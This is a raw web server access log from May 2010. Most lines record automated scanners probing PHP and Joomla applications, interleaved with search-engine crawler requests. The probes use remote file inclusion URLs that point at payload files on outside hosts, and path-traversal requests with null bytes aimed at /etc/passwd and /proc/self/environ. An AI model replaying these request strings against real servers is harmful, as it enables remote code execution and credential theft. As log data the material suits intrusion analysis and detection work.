91.121.208.42 - - [20/May/2010:09:18:36 -0500] "GET /logs/access_log.1264118400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
193.105.206.194 - - [20/May/2010:09:18:38 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
193.105.206.194 - - [20/May/2010:09:18:38 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
193.105.206.194 - - [20/May/2010:09:18:38 -0500] "GET /logs/access_log.1262649600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
80.67.23.184 - - [20/May/2010:09:18:41 -0500] "GET /logs/access_log.1271894400//atom.php5?page=http://www.thaismecity.com/thaismejob/include/idv6.txt??%0D?? HTTP/1.1" 404 321 "-""libwww-perl/5.808"
80.67.23.184 - - [20/May/2010:09:19:35 -0500] "GET /logs/access_log.1271894400%20//atom.php5?page=http://www.thaismecity.com/thaismejob/include/idv6.txt??%0D?? HTTP/1.1" 404 322 "-""libwww-perl/5.808"
124.217.229.185 - - [20/May/2010:09:19:44 -0500] "GET /logs//index.php?option=vwar_root&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
121.190.102.21 - - [20/May/2010:09:19:44 -0500] "GET //register.php/lostpasswd.php?env[include_prefix]=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
121.190.102.21 - - [20/May/2010:09:19:44 -0500] "GET /logs//register.php/lostpasswd.php?env[include_prefix]=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
121.190.102.21 - - [20/May/2010:09:19:44 -0500] "GET /logs/access_log.1271548800//register.php/lostpasswd.php?env[include_prefix]=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
124.217.229.185 - - [20/May/2010:09:19:44 -0500] "GET //index.php?option=vwar_root&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
193.105.206.194 - - [20/May/2010:09:20:03 -0500] "GET /logs/access_log.1264118400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
124.217.229.185 - - [20/May/2010:09:20:56 -0500] "GET /logs//index.php?option=vwar_root&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [20/May/2010:09:20:57 -0500] "GET //index.php?option=vwar_root&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
216.245.220.19 - - [20/May/2010:09:21:34 -0500] "GET /logs/access_log.1263427200///bbs//write_update.php?board_skin_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
91.121.208.42 - - [20/May/2010:09:21:37 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
91.121.208.42 - - [20/May/2010:09:21:37 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:09:21:37 -0500] "GET /logs/access_log.1193529600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
91.121.208.42 - - [20/May/2010:09:21:37 -0500] "GET /logs/access_log.1262649600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
216.245.220.19 - - [20/May/2010:09:22:00 -0500] "GET /logs/access_log.1263427200///bbs//write_update.php?board_skin_path=http://201.199.194.8/conta/auto1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
207.46.204.230 - - [20/May/2010:09:22:35 -0500] "GET /logs/access_log.1214524800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.208.42 - - [20/May/2010:09:22:57 -0500] "GET /logs/access_log.1264118400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:09:26:22 -0500] "GET /logs/access_log.1162425600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
209.126.254.162 - - [20/May/2010:09:29:02 -0500] "GET /?option=com_typedcontent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.76"
174.133.201.194 - - [20/May/2010:09:30:01 -0500] "GET /logs//*.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
174.133.201.194 - - [20/May/2010:09:30:02 -0500] "GET //*.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.834"
67.222.30.85 - - [20/May/2010:09:30:24 -0500] "GET /logs//admin/auth.php?xcart_dir=http://www.bizbidder.net/cache/lib/fatal1.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
67.222.30.85 - - [20/May/2010:09:30:24 -0500] "GET /logs/access_log.1271548800//admin/auth.php?xcart_dir=http://www.bizbidder.net/cache/lib/fatal1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
67.222.30.85 - - [20/May/2010:09:30:24 -0500] "GET //admin/auth.php?xcart_dir=http://www.bizbidder.net/cache/lib/fatal1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
193.105.206.194 - - [20/May/2010:09:31:29 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
193.105.206.194 - - [20/May/2010:09:31:29 -0500] "GET /logs/access_log.1271548800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
193.105.206.194 - - [20/May/2010:09:31:29 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
94.23.9.198 - - [20/May/2010:09:31:32 -0500] "GET /logs/access_log.1271548800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 361 "-""Mozilla/5.0"
94.23.9.198 - - [20/May/2010:09:31:32 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
94.23.9.198 - - [20/May/2010:09:31:32 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
125.245.160.200 - - [20/May/2010:09:32:37 -0500] "GET /logs/access_log.1271548800//auth/auth.php?phpbb_root_path=http://www.feneume.org/administrator/components/com_rssreader2/idxx.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
125.245.160.200 - - [20/May/2010:09:32:37 -0500] "GET /logs//auth/auth.php?phpbb_root_path=http://www.feneume.org/administrator/components/com_rssreader2/idxx.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
125.245.160.200 - - [20/May/2010:09:32:37 -0500] "GET //auth/auth.php?phpbb_root_path=http://www.feneume.org/administrator/components/com_rssreader2/idxx.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
125.245.160.200 - - [20/May/2010:09:32:54 -0500] "GET /logs//auth/auth.php?phpbb_root_path=http://www.feneume.org/administrator/components/com_rssreader2/idxx.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
125.245.160.200 - - [20/May/2010:09:32:54 -0500] "GET /logs/access_log.1271548800//auth/auth.php?phpbb_root_path=http://www.feneume.org/administrator/components/com_rssreader2/idxx.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
125.245.160.200 - - [20/May/2010:09:32:54 -0500] "GET //auth/auth.php?phpbb_root_path=http://www.feneume.org/administrator/components/com_rssreader2/idxx.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:09:32:59 -0500] "GET /logs/access_log.1159488000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
208.66.64.71 - - [20/May/2010:09:34:09 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
208.66.64.71 - - [20/May/2010:09:34:14 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
208.66.64.71 - - [20/May/2010:09:34:34 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
208.66.64.71 - - [20/May/2010:09:34:43 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
208.66.64.71 - - [20/May/2010:09:35:03 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
208.66.64.71 - - [20/May/2010:09:35:07 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
211.239.161.143 - - [20/May/2010:09:35:39 -0500] "GET //errors.php?error=http://plik.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
211.239.161.143 - - [20/May/2010:09:35:40 -0500] "GET /logs//errors.php?error=http://plik.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
208.66.64.71 - - [20/May/2010:09:35:46 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
208.66.64.71 - - [20/May/2010:09:35:50 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
74.55.52.154 - - [20/May/2010:09:37:01 -0500] "GET //errors.php?error=http://plik.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
74.55.52.154 - - [20/May/2010:09:37:02 -0500] "GET /logs//errors.php?error=http://plik.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
67.222.30.85 - - [20/May/2010:09:37:40 -0500] "GET /logs/access_log.1271116800//admin/auth.php?xcart_dir=http://www.bizbidder.net/cache/lib/fatal1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
67.222.30.85 - - [20/May/2010:09:37:40 -0500] "GET /logs/access_log.1265673600//admin/auth.php?xcart_dir=http://www.bizbidder.net/cache/lib/fatal1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
207.46.199.185 - - [20/May/2010:09:37:53 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.226 - - [20/May/2010:09:40:06 -0500] "GET /logs/access_log.1160870400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.252.3.123 - - [20/May/2010:09:40:37 -0500] "GET //errors.php?error=http://plik.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.808"
87.252.3.123 - - [20/May/2010:09:40:38 -0500] "GET /logs//errors.php?error=http://plik.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.808"
87.250.255.243 - - [20/May/2010:09:40:38 -0500] "GET /logs/access_log.1207612800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
80.67.23.184 - - [20/May/2010:09:41:22 -0500] "GET //errors.php?error=http://www.thaismecity.com/thaismejob/include/idv6.txt??%0D?? HTTP/1.1" 404 295 "-""libwww-perl/5.808"
80.67.23.184 - - [20/May/2010:09:41:22 -0500] "GET /logs/access_log.1270857600//errors.php?error=http://www.thaismecity.com/thaismejob/include/idv6.txt??%0D?? HTTP/1.1" 404 322 "-""libwww-perl/5.808"
80.67.23.184 - - [20/May/2010:09:41:22 -0500] "GET /logs//errors.php?error=http://www.thaismecity.com/thaismejob/include/idv6.txt??%0D?? HTTP/1.1" 404 300 "-""libwww-perl/5.808"
69.90.47.83 - - [20/May/2010:09:42:08 -0500] "GET /logs/access_log.1206921600//?path%5Bdocroot%5D=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
69.90.47.83 - - [20/May/2010:09:42:08 -0500] "GET //?path%5Bdocroot%5D=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
69.90.47.83 - - [20/May/2010:09:42:08 -0500] "GET /logs//?path%5Bdocroot%5D=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 200 6278 "-""libwww-perl/5.805"
77.79.246.241 - - [20/May/2010:09:43:40 -0500] "GET /logs/access_log.1273276800/xmlrpc.php HTTP/1.1" 404 321 "-""Mozilla/5.0"
77.79.246.241 - - [20/May/2010:09:43:41 -0500] "GET /xmlrpc.php HTTP/1.1" 404 294 "-""Mozilla/5.0"
77.79.246.241 - - [20/May/2010:09:43:41 -0500] "GET /logs/xmlrpc.php HTTP/1.1" 404 299 "-""Mozilla/5.0"
208.66.64.71 - - [20/May/2010:09:43:53 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.808"
208.66.64.71 - - [20/May/2010:09:43:53 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.808"
208.66.64.71 - - [20/May/2010:09:43:54 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
67.195.112.180 - - [20/May/2010:09:44:36 -0500] "GET /logs/access_log.1215561600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
208.66.64.71 - - [20/May/2010:09:45:45 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
208.66.64.71 - - [20/May/2010:09:45:45 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
208.66.64.71 - - [20/May/2010:09:45:46 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
77.79.246.241 - - [20/May/2010:09:46:02 -0500] "GET /logs/access_log.1273363200/xmlrpc.php HTTP/1.1" 404 321 "-""Mozilla/5.0"
208.66.64.71 - - [20/May/2010:09:46:41 -0500] "GET /logs/access_log.1273017600/*.php?option=com_gcalendar&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.808"
208.66.64.71 - - [20/May/2010:09:46:57 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
208.66.64.71 - - [20/May/2010:09:46:57 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
208.66.64.71 - - [20/May/2010:09:46:58 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
208.66.64.71 - - [20/May/2010:09:47:05 -0500] "GET /logs/access_log.1273363200//?option=com_gcalendar&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.808"
208.66.64.71 - - [20/May/2010:09:47:05 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
208.66.64.71 - - [20/May/2010:09:47:06 -0500] "GET /logs//?option=com_gcalendar&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6278 "-""libwww-perl/5.808"
87.250.255.243 - - [20/May/2010:09:47:15 -0500] "GET /logs/access_log.1175904000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
209.126.254.162 - - [20/May/2010:09:47:57 -0500] "GET /logs/access_log.1205107200/?option=com_typedcontent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.76"
209.126.254.162 - - [20/May/2010:09:47:57 -0500] "GET /?option=com_typedcontent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.76"
209.126.254.162 - - [20/May/2010:09:47:57 -0500] "GET /logs/?option=com_typedcontent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6273 "-""libwww-perl/5.76"
208.66.64.71 - - [20/May/2010:09:48:29 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_gcalendar&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
203.251.80.167 - - [20/May/2010:09:48:57 -0500] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
203.251.80.167 - - [20/May/2010:09:48:57 -0500] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
203.251.80.167 - - [20/May/2010:09:48:57 -0500] "GET /logs/access_log.1273363200%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
203.251.80.167 - - [20/May/2010:09:49:02 -0500] "GET /logs/access_log.1273363200%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
203.251.80.167 - - [20/May/2010:09:49:02 -0500] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
203.251.80.167 - - [20/May/2010:09:49:02 -0500] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
94.23.20.123 - - [20/May/2010:09:49:42 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.20.123 - - [20/May/2010:09:49:42 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.20.123 - - [20/May/2010:09:49:43 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.20.123 - - [20/May/2010:09:49:44 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
208.66.64.71 - - [20/May/2010:09:49:53 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
208.66.64.71 - - [20/May/2010:09:50:05 -0500] "GET /logs/access_log.1273017600//?option=com_gcalendar&controller=../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.808"
121.78.118.123 - - [20/May/2010:09:50:27 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
121.78.118.123 - - [20/May/2010:09:50:27 -0500] "GET /logs/access_log.1262649600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
121.78.118.123 - - [20/May/2010:09:50:27 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.78.118.123 - - [20/May/2010:09:50:45 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 334 "-""Mozilla/5.0"
121.78.118.123 - - [20/May/2010:09:50:45 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.78.118.123 - - [20/May/2010:09:50:45 -0500] "GET /logs/access_log.1262649600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
94.23.20.123 - - [20/May/2010:09:50:55 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.20.123 - - [20/May/2010:09:50:56 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
121.78.118.123 - - [20/May/2010:09:50:56 -0500] "GET /logs/access_log.1264118400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
207.46.13.144 - - [20/May/2010:09:51:05 -0500] "GET /logs/access_log.1188432000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.23.20.123 - - [20/May/2010:09:51:09 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.20.123 - - [20/May/2010:09:51:09 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
121.78.118.123 - - [20/May/2010:09:51:33 -0500] "GET /logs/access_log.1264118400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:09:52:55 -0500] "GET /logs/access_log.1175212800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
209.126.254.162 - - [20/May/2010:09:53:36 -0500] "GET /logs//*.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.76"
209.126.254.162 - - [20/May/2010:09:53:36 -0500] "GET //*.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.76"
89.163.148.130 - - [20/May/2010:09:53:49 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
89.163.148.130 - - [20/May/2010:09:53:50 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
89.163.148.130 - - [20/May/2010:09:55:19 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
213.92.118.159 - - [20/May/2010:09:57:42 -0500] "GET /logs/access_log.1271548800/webcalendar/tools/send_reminders.php?noSet=http://christenplein.com/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
213.92.118.159 - - [20/May/2010:09:57:42 -0500] "GET /webcalendar/tools/send_reminders.php?noSet=http://christenplein.com/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
213.92.118.159 - - [20/May/2010:09:57:42 -0500] "GET /logs/webcalendar/tools/send_reminders.php?noSet=http://christenplein.com/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
195.56.172.136 - - [20/May/2010:09:58:09 -0500] "GET /logs//forum/install.php?phpbb_root_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 307 "-""libwww-perl/5.803"
195.56.172.136 - - [20/May/2010:09:58:09 -0500] "GET //forum/install.php?phpbb_root_dir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.803"
89.163.148.130 - - [20/May/2010:09:58:21 -0500] "GET /logs/access_log.1271894400/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
89.163.148.130 - - [20/May/2010:09:58:21 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
89.163.148.130 - - [20/May/2010:09:58:22 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.250.255.243 - - [20/May/2010:09:58:34 -0500] "GET /logs/access_log.1170288000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
89.163.148.130 - - [20/May/2010:09:58:36 -0500] "GET /logs//index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.163.148.130 - - [20/May/2010:09:58:37 -0500] "GET //index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.115.111.115 - - [20/May/2010:10:03:04 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://halupa.org.ua//plugins/sh/auto1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
211.115.111.115 - - [20/May/2010:10:03:04 -0500] "GET /logs/access_log.1273363200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://halupa.org.ua//plugins/sh/auto1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.115.111.115 - - [20/May/2010:10:03:04 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://halupa.org.ua//plugins/sh/auto1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
211.233.3.101 - - [20/May/2010:10:04:06 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://ssp3.ilawa.pl/components/com_zoom/tabs/do??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
211.233.3.101 - - [20/May/2010:10:04:06 -0500] "GET /logs/access_log.1271548800/e404.php?DOCUMENT_ROOT=http://ssp3.ilawa.pl/components/com_zoom/tabs/do??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
211.233.3.101 - - [20/May/2010:10:04:06 -0500] "GET /e404.php?DOCUMENT_ROOT=http://ssp3.ilawa.pl/components/com_zoom/tabs/do??? HTTP/1.1" 404 292 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:10:04:14 -0500] "GET /logs/access_log.1157932800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
80.67.23.184 - - [20/May/2010:10:06:25 -0500] "GET /logs/errors.php?error=http://www.thaismecity.com/thaismejob/include/idv6.txt??%0D?? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
